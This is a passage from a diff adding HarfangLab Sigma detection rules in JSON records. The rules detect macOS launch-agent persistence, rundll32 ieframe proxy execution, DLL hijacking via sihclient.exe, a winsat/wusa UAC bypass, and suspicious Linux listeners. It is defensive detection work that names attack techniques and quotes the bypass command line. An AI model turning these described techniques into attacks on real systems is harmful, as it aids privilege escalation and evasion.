AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Path|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n - '/private/var/root/Library/LaunchAgents/'\n - '/Library/User Template/Library/LaunchAgents/'\n Kind: 'create'\n ProcessImage|endswith: '/PlistBuddy'\n\n condition: all of selection_*\nlevel: medium\n#level: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "08393432-4fef-4e8b-aa5e-fc13131e09c3",
+ "rule_name": "Launch Agent/Daemon Created via PlistBuddy",
+ "rule_description": "Detects the creation of a launch agent or daemon using PlistBuddy.\nAdversaries may build a plist from scratch using PlistBuddy in order to establish a means of persistence.\nIt is recommended to check the content of the newly created plist file for malicious content.\n",
+ "rule_creation_date": "2024-06-18",
+ "rule_modified_date": "2025-01-20",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1543.001",
+ "attack.t1543.004"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0850e834-f366-4ebb-a022-79bc7b74fc1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.069400Z",
+ "creation_date": "2026-03-23T11:45:34.069403Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.069410Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://lolbas-project.github.io/lolbas/Libraries/Ieframe/",
+ "https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268",
+ "https://attack.mitre.org/techniques/T1218/011/"
+ ],
+ "name": "t1218_011_rundll32_ieframe_proxy_execution.yml",
+ "content": "title: Proxy Execution via ieframe.dll\nid: 0850e834-f366-4ebb-a022-79bc7b74fc1a\ndescription: |\n Detects a suspicious invocation of ieframe.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe to execute malicious code indirectly (by calling ieframe.dll's OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Ieframe/\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/10/17\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Ieframe\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n ProcessParentOriginalFileName: 'rundll32.exe'\n\n selection_ieframe:\n ParentCommandLine|contains:\n - ' ieframe,'\n - ' ieframe.dll,'\n\n selection_function:\n ParentCommandLine|contains: 'OpenURL'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0850e834-f366-4ebb-a022-79bc7b74fc1a",
+ "rule_name": "Proxy Execution via ieframe.dll",
+ "rule_description": "Detects a suspicious invocation of ieframe.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe to execute malicious code indirectly (by calling ieframe.dll's OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\n",
+ "rule_creation_date": "2025-10-17",
+ "rule_modified_date": "2025-10-30",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1216.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "085b257b-644f-4cc1-bc25-578447cf5bf2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.589223Z",
+ "creation_date": "2026-03-23T11:45:34.589227Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.589234Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://securityintelligence.com/posts/windows-features-dll-sideloading/",
+ "https://github.com/xforcered/WFH",
+ "https://wietze.github.io/blog/save-the-environment-variables",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_sihclient.yml",
+ "content": "title: DLL Hijacking via sihclient.exe\nid: 085b257b-644f-4cc1-bc25-578447cf5bf2\ndescription: |\n Detects potential Windows DLL Hijacking via sihclient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sihclient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\dnsapi.dll'\n - '\\winhttp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "085b257b-644f-4cc1-bc25-578447cf5bf2",
+ "rule_name": "DLL Hijacking via sihclient.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via sihclient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0882e820-0755-4f74-94e4-b9ae77d3294d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.598454Z",
+ "creation_date": "2026-03-23T11:45:34.598457Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.598465Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1595/"
+ ],
+ "name": "t1595_wifi_scanning_airport_macos.yml",
+ "content": "title: Wi-Fi Networks Scanned via airport\nid: 0882e820-0755-4f74-94e4-b9ae77d3294d\ndescription: |\n Detects the execution of the airport command to scan nearby Wi-Fi networks.\n Attackers may use it during the discovery phase of an attack to search for unauthenticated Wi-Fi networks to connect to.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1595/\ndate: 2024/07/03\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|contains: '/airport'\n CommandLine|contains: ' -s'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0882e820-0755-4f74-94e4-b9ae77d3294d",
+ "rule_name": "Wi-Fi Networks Scanned via airport",
+ "rule_description": "Detects the execution of the airport command to scan nearby Wi-Fi networks.\nAttackers may use it during the discovery phase of an attack to search for unauthenticated Wi-Fi networks to connect to.\nIt is recommended to check for other suspicious activity by the parent process.\n",
+ "rule_creation_date": "2024-07-03",
+ "rule_modified_date": "2025-01-20",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [],
+ "rule_technique_tags": [
+ "attack.t1595"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "08c82317-1fb0-42b6-b3cc-cf85ace1deb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.081044Z",
+ "creation_date": "2026-03-23T11:45:34.081047Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.081051Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1204/002/",
+ "https://attack.mitre.org/techniques/T1036/007/"
+ ],
+ "name": "t1036_007_executable_with_multiple_extension.yml",
+ "content": "title: PE with Multiple Extensions Executed\nid: 08c82317-1fb0-42b6-b3cc-cf85ace1deb8\ndescription: |\n Detects the execution of a suspicious executable with multiple extensions.\n Attackers can add multiple extensions to an executable file to lure users into double clicking on the file.\n Since Windows by default doesn't display the last extension, users will only be able to see the fake extension. This is done by attackers to masquerade the PE as a different file type, usually a document.\n It is recommended to analyze the executed file to determine whether its execution is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1036/007/\ndate: 2021/03/30\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1036.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|re: '(?i)\\.(?:xlsx?|pptx?|docx?|pdf|zip|rar|7z|png|jpe?g|bmp|gif|psd|tiff)\\s{0,4}\\.exe$'\n\n exclusion_ranorex:\n Image|endswith: '\\Ranorex.PDF.exe'\n OriginalFileName: 'Ranorex.PDF.exe'\n InternalName: 'Ranorex.PDF.exe'\n\n exclusion_portablegit:\n Image|endswith: '\\PortableGit-*.7z.exe'\n Signature: 'Johannes Schindelin'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "08c82317-1fb0-42b6-b3cc-cf85ace1deb8",
+ "rule_name": "PE with Multiple Extensions Executed",
+ "rule_description": "Detects the execution of a suspicious executable with multiple extensions.\nAttackers can add multiple extensions to an executable file to lure users into double clicking on the file.\nSince Windows by default doesn't display the last extension, users will only be able to see the fake extension. This is done by attackers to masquerade the PE as a different file type, usually a document.\nIt is recommended to analyze the executed file to determine whether its execution is legitimate.\n",
+ "rule_creation_date": "2021-03-30",
+ "rule_modified_date": "2025-02-04",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.execution"
+ ],
+ "rule_technique_tags": [
+ "attack.t1036.007",
+ "attack.t1204.002"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "08ddafaf-401d-4c3d-9389-e96925e90f0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.628428Z",
+ "creation_date": "2026-03-23T11:45:34.628430Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.628434Z",
+ "rule_level": "medium",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.elastic.co/security-labs/inital-research-of-jokerspy",
+ "https://attack.mitre.org/techniques/T1204/002/",
+ "https://attack.mitre.org/techniques/T1564/001/"
+ ],
+ "name": "t1204_002_shared_folder_execution.yml",
+ "content": "title: File Executed from Users Shared Folder\nid: 08ddafaf-401d-4c3d-9389-e96925e90f0f\ndescription: |\n Detects the execution of a file from the Users shared folder.\n Adversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\n It is recommended to check the executed process and its parents/children for malicious behavior.\nreferences:\n - https://www.elastic.co/security-labs/inital-research-of-jokerspy\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/05/10\nmodified: 2025/09/24\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|startswith: '/Users/shared/'\n GrandparentImage|contains: '?'\n\n # This is handled by the rule d44c6de2-d37f-4e36-8fa1-f23231dd7632\n filter_launchd:\n ProcessParentImage: '/sbin/launchd'\n\n exclusion_relocated:\n Image|startswith: '/Users/Shared/Relocated Items/Security/Applications/'\n GrandparentImage:\n - '/sbin/launchd'\n - '/Users/Shared/Relocated Items/Security/Applications/*'\n\n exclusion_gimp:\n ProcessGrandparentImage: '/Users/Shared/Previously Relocated Items/Security/GIMP.app/Contents/MacOS/GIMP-bin'\n # todo: add signature\n\n exclusion_logioption:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.logi.optionsplus.*'\n\n exclusion_hotreload:\n ProcessGrandparentImage:\n - '/Users/Shared/singularitygroup-hotreload/executables_*/HotReload.app/Contents/MacOS/HotReload'\n - '/Users/Shared/singularitygroup-hotreload/executables_*/HotReload.app/Contents/Resources/CodePatcherCLI'\n # todo: add signature\n\n exclusion_riotgames:\n - Image:\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper (Renderer).app/Contents/MacOS/Riot Client Helper (Renderer)'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper (GPU).app/Contents/MacOS/Riot Client Helper (GPU)'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper.app/Contents/MacOS/Riot Client Helper'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/MacOS/Riot Client'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Electron Framework.framework/Versions/A/Helpers/chrome_crashpad_handler'\n ParentImage: '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/MacOS/Riot Client'\n - Image: '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientCrashHandler'\n ParentImage: '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientServices'\n - Image:\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientServices'\n - '/users/shared/riot games/riot client.app/contents/frameworks/riot client.app/contents/macos/riot client'\n - '/users/shared/riot games/riot client.app/contents/frameworks/riot client.app/contents/frameworks/riot client helper (renderer).app/contents/macos/riot client helper (renderer)'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.riotgames.RiotGames.*'\n\n exclusion_lghub:\n - ParentImage: '/Applications/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n - Image: '/Users/Shared/LGHUB/depots/*/core/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n exclusion_battlenet:\n Image: '/Users/Shared/Battle.net/Agent/Agent.app/Contents/MacOS/Switcher'\n\n exclusion_wizards:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.wizards.mtga'\n\n exclusion_maxon:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'net.maxon.maxonapp.installer'\n\n exclusion_gog:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.gog.galaxy.updater'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "08ddafaf-401d-4c3d-9389-e96925e90f0f",
+ "rule_name": "File Executed from Users Shared Folder",
+ "rule_description": "Detects the execution of a file from the Users shared folder.\nAdversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\nIt is recommended to check the executed process and its parents/children for malicious behavior.\n",
+ "rule_creation_date": "2024-05-10",
+ "rule_modified_date": "2025-09-24",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.execution"
+ ],
+ "rule_technique_tags": [
+ "attack.t1204.002",
+ "attack.t1564.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "08e4776f-548a-4b01-8538-c2af435dce4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.093473Z",
+ "creation_date": "2026-03-23T11:45:34.093475Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.093479Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198"
+ ],
+ "name": "t1548_002_uac_bypass_winsat.yml",
+ "content": "title: UAC Bypass Executed via winsat.exe\nid: 08e4776f-548a-4b01-8538-c2af435dce4b\ndescription: |\n Detects UAC bypass involving the hijacking of the devobj.dll or powrprof.dll DLL via winsat.exe (Windows System Assessment Tool).\n This UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer).\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198\ndate: 2025/01/31\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_prepare:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /c wusa ?:\\Users\\\\*\\AppData\\Local\\Temp\\update.msu /extract:?:\\Windows\\system32\\sysprep\\'\n\n selection_exploit:\n CommandLine: '?:\\Windows\\system32\\sysprep\\winsat.exe'\n ProcessIntegrityLevel: 'High'\n ProcessParentIntegrityLevel: 'Medium'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "08e4776f-548a-4b01-8538-c2af435dce4b",
+ "rule_name": "UAC Bypass Executed via winsat.exe",
+ "rule_description": "Detects UAC bypass involving the hijacking of the devobj.dll or powrprof.dll DLL via winsat.exe (Windows System Assessment Tool).\nThis UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer).\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\n",
+ "rule_creation_date": "2025-01-31",
+ "rule_modified_date": "2025-01-31",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1548.002",
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "08f3ae91-3811-4a4b-8f04-87302ca365c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "weak",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.612661Z",
+ "creation_date": "2026-03-23T11:45:34.612665Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.612672Z",
+ "rule_level": "medium",
+ "rule_confidence": "weak",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1571/",
+ "https://attack.mitre.org/techniques/T1205/001/",
+ "https://attack.mitre.org/techniques/T1104/"
+ ],
+ "name": "t1571_process_listen_connections_suspicious_path.yml",
+ "content": "title: Process Started Listening for Incoming Connections from Suspicious Path\nid: 08f3ae91-3811-4a4b-8f04-87302ca365c9\ndescription: |\n Detects a process that starts listening for incoming connections from a suspicious path.\n Attackers may setup reverse shells listening for incoming connections as a persistence and C2 mechanism.\n It is recommended to ensure the process had legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://attack.mitre.org/techniques/T1571/\n - https://attack.mitre.org/techniques/T1205/001/\n - https://attack.mitre.org/techniques/T1104/\ndate: 2023/12/15\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1571\n - attack.t1104\n - attack.defense_evasion\n - attack.persistence\n - attack.t1205.001\n - classification.Linux.Source.NetworkListen\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: network_listen\n product: linux\ndetection:\n\n selection:\n ProcessImage|startswith:\n - '/tmp/'\n - '/var/'\n - '/run/'\n - '/root/'\n - '/dev/shm/'\n - '/boot/'\n\n filter_var:\n ProcessImage|startswith:\n - '/var/lib/'\n - '/var/opt/'\n\n # Ports opened on localhost aren't considered suspicious\n filter_localhost:\n Address:\n - '127.0.0.1'\n - '::1'\n\n exclusion_java:\n # Java is embedded in so much application it becomes quickly unfeasable to list all of them\n ProcessImage|endswith: '/java'\n\n exclusion_hoptimal:\n ProcessImage: '/tmp/InstalleurVIDALHoptimalAndApi_unix_*/jre/bin/java'\n\n exclusion_go:\n # 